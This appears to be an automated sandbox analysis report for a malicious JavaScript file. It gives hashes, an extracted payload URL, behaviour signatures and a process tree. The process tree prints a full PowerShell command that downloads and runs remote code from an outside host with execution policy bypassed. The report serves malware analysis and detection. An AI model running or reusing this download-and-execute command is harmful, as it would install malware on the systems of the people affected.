Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
2a6c67f8d62b335ae1d000be7e427a279911bfa98b28c2f886d602bb28f1b688.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
2a6c67f8d62b335ae1d000be7e427a279911bfa98b28c2f886d602bb28f1b688.js
Resource
win10v2004-20240226-en
General
-
Target
2a6c67f8d62b335ae1d000be7e427a279911bfa98b28c2f886d602bb28f1b688.js
-
Size
62KB
-
MD5
e46c3f1cc23168063e57407b7a4f4a1f
-
SHA1
be7c6d0ae556008de2799fbeee14445a1a60a5e7
-
SHA256
2a6c67f8d62b335ae1d000be7e427a279911bfa98b28c2f886d602bb28f1b688
-
SHA512
db7cdd134e401b0315b427e070a21e807fd38298b828d0de78e18191486c7fcb306c2d8d549975a7c67403724801213c4a512085b1c154130c34fdfd3438169d
-
SSDEEP
1536:PxP8ZatXI/SQAjTLVcMkti+sDk9D6otJ0:PxU8FI/S7jXV8ti+sDk9JQ
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2000 powershell.exe 4 2000 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2000 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2612 wrote to memory of 2000 2612 wscript.exe 28 PID 2612 wrote to memory of 2000 2612 wscript.exe 28 PID 2612 wrote to memory of 2000 2612 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2a6c67f8d62b335ae1d000be7e427a279911bfa98b28c2f886d602bb28f1b688.js1⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-